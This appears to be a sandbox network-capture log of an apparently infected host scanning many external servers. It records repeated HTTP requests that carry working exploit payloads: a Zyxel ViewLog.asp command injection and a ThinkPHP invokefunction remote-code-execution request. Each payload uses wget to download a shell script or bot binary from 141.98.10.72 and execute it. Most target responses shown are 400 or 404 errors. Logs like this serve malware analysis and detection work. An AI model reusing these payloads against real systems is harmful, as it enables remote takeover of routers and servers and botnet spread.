Feb 14, 2024 09:30:22.872689009 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:03.835385084 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
345	192.168.2.15	45580	31.136.129.194	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:41.455075979 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:42.137758017 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:43.481729984 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:46.265702963 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:51.641561031 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:02.393388987 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:24.920541048 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:07.927265882 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
346	192.168.2.15	47194	62.231.108.126	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:41.483633041 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:41.709477901 CET	445	IN	HTTP/1.1 404 Not Found Date: Wed, 14 Feb 2024 08:45:42 GMT Server: Apache/2.4.6 (CentOS) Content-Length: 217 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
347	192.168.2.15	56594	62.84.119.18	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:41.488308907 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:41.725195885 CET	305	IN	HTTP/1.1 404 X-Application-Context: application Content-Type: application/json;charset=UTF-8 Transfer-Encoding: chunked Date: Wed, 14 Feb 2024 08:29:41 GMT Data Raw: 37 62 0d 0a 7b 22 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 30 37 38 39 39 33 38 31 33 31 31 2c 22 73 74 61 74 75 73 22 3a 34 30 34 2c 22 65 72 72 6f 72 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 4e 6f 20 6d 65 73 73 61 67 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 22 70 61 74 68 22 3a 22 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 22 7d 0d 0a Data Ascii: 7b{"timestamp":1707899381311,"status":404,"error":"Not Found","message":"No message available","path":"/cgi-bin/ViewLog.asp"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
348	192.168.2.15	48820	31.43.105.29	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:41.490322113 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:41.723164082 CET	536	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:29:41 GMT Server: X-Frame-Options: SAMEORIGIN Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval' ; object-src 'self' ; worker-src 'self' blob: Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
349	192.168.2.15	60324	94.26.41.196	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:41.656148911 CET	380	IN	HTTP/1.0 400 Bad Request Content-Type: text/html Server: httpd Date: Wed, 14 Feb 2024 10:29:41 GMT Connection: close Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
350	192.168.2.15	57918	88.32.110.170	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:42.295082092 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:42.510452032 CET	325	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.1 Date: Wed, 14 Feb 2024 08:29:41 GMT Content-Type: text/html Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>
Feb 14, 2024 09:29:42.715861082 CET	325	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.1 Date: Wed, 14 Feb 2024 08:29:41 GMT Content-Type: text/html Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
351	192.168.2.15	39124	95.217.80.174	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:42.740947962 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:42.960546970 CET	437	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:29:42 GMT Server: Apache/2.4.58 (IUS) OpenSSL/1.0.2k-fips Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
352	192.168.2.15	58794	95.216.140.64	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:42.743455887 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:42.968424082 CET	1286	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:29:42 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Accept-Ranges: bytes Vary: Accept-Encoding Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Content-Type: text/html Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-
Feb 14, 2024 09:29:42.968461037 CET	1286	IN	Data Raw: 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 Data Ascii: size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { backgr
Feb 14, 2024 09:29:42.968498945 CET	1286	IN	Data Raw: 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a Data Ascii: padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left;
Feb 14, 2024 09:29:42.968538046 CET	1286	IN	Data Raw: 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 Data Ascii: -image { float: left; } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute;
Feb 14, 2024 09:29:42.968606949 CET	1286	IN	Data Raw: 77 71 4e 69 62 59 33 38 6d 6c 76 58 4b 44 64 55 35 70 44 48 33 54 52 6b 6c 34 30 76 78 4a 6b 5a 2b 44 4f 32 4e 75 2f 33 48 6e 79 43 37 74 31 35 6f 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 Data Ascii: wqNibY38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md
